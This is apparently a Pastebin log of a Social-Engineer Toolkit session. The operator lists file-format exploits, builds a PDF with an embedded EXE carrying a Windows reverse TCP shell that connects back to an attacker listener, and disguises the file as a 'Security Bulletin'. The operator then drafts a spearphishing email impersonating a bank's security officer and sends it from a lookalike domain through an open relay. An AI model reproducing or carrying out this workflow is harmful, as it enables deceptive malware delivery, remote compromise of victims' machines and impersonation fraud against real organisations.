Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- set> 1
- The Spearphishing module allows you to specially craft email messages and send
- them to a large (or small) number of people with attached fileformat malicious
- payloads. If you want to spoof your email address, be sure "Sendmail" is in-
- stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
- flag to SENDMAIL=ON.
- There are two options, one is getting your feet wet and letting SET do
- everything for you (option 1), the second is to create your own FileFormat
- payload and use it in your own attack. Either way, good luck and enjoy!
- 1) Perform a Mass Email Attack
- 2) Create a FileFormat Payload
- 3) Create a Social-Engineering Template
- 99) Return to Main Menu
- set:phishing>2
- Select the file format exploit you want.
- The default is the PDF embedded EXE.
- ********** PAYLOADS **********
- 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
- 2) SET Custom Written Document UNC LM SMB Capture Attack
- 3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
- 4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
- 5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
- 6) Adobe Flash Player "Button" Remote Code Execution
- 7) Adobe CoolType SING Table "uniqueName" Overflow
- 8) Adobe Flash Player "newfunction" Invalid Pointer Use
- 9) Adobe Collab.collectEmailInfo Buffer Overflow
- 10) Adobe Collab.getIcon Buffer Overflow
- 11) Adobe JBIG2Decode Memory Corruption Exploit
- 12) Adobe PDF Embedded EXE Social Engineering
- 13) Adobe util.printf() Buffer Overflow
- 14) Custom EXE to VBA (sent via RAR) (RAR required)
- 15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
- 16) Adobe PDF Embedded EXE Social Engineering (NOJS)
- 17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
- 18) Apple QuickTime PICT PnSize Buffer Overflow
- 19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
- 20) Adobe Reader u3D Memory Corruption Vulnerability
- 21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
- set:payloads>12
- [-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
- 1. Use your own PDF for attack
- 2. Use built-in BLANK PDF for attack
- set:payloads>2
- 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
- 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
- 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
- 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
- 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
- 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
- 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- set:payloads>4
- set> IP address for the payload listener: 8.8.8.8
- set:payloads> Port to connect back on [443]:443
- [-] Generating fileformat exploit...
- [*] Payload creation complete.
- [*] All payloads get sent to the /root/.set/template.pdf directory
- [-] As an added bonus, use the file-format creator in SET to create your attachment.
- Right now the attachment will be imported with filename of 'template.whatever'
- Do you want to rename the file?
- example Enter the new filename: moo.pdf
- 1. Keep the filename, I don't care.
- 2. Rename the file, I want to be cool.
- set:phishing>2
- set:phishing> New filename:Security Bulletin
- [*] Filename changed, moving on...
- Social Engineer Toolkit Mass E-Mailer
- There are two options on the mass e-mailer, the first would
- be to send an email to one individual person. The second option
- will allow you to import a list and send it to as many people as
- you want within that list.
- What do you want to do:
- 1. E-Mail Attack Single Email Address
- 2. E-Mail Attack Mass Mailer
- 99. Return to main menu.
- set:phishing>1
- Do you want to use a predefined template or craft
- a one time email template.
- 1. Pre-Defined Template
- 2. One-Time Use Email Template
- set:phishing>2
- set:phishing> Subject of the email:New Security Bulletin
- set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
- set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Hello Mr. Public,
- Next line of the body:
- Next line of the body: This is Richard Young from the corporate office in New York.
- Next line of the body: I wanted to make sure that you received our most recent security bulletin. It covers some very crucial information about protecting your systems from network based attacks.
- Next line of the body: Please ensure that all of the employees at your Tempe, AZ branch read this as well.
- Next line of the body:
- Next line of the body: Thank you very much,
- Next line of the body: Richard Young
- Next line of the body: Security Operations Center
- Next line of the body: First Bank of Acmeland^Cset:phishing> Send email to:jpublic@firstacmeland.com
- 1. Use a gmail Account for your email attack.
- 2. Use your own server or open relay
- set:phishing>2
- set:phishing> From address (ex: moo@example.com):ryoung@firstacme1and.com
- set:phishing> The FROM NAME user will see: :Richard Young
- set:phishing> Username for open-relay [blank]:
- Password for open-relay [blank]:
- set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.firstacme1and.com
- set:phishing> Port number for the SMTP server [25]:
- set:phishing> Flag this message/s as high priority? [yes|no]:yes
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement